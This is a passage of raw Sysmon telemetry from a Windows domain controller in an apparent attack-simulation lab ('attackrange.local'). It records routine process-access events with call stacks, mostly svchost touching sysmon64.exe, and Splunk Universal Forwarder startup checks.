12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.362{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.364{266CAFBE-647F-6064-4F00-00000000AE01}3232C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647F-6064-4D00-00000000AE01}28042548C:\Windows\system32\cmd.exe{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.339{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000002338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-4D00-00000000AE01}2804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:03.330{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 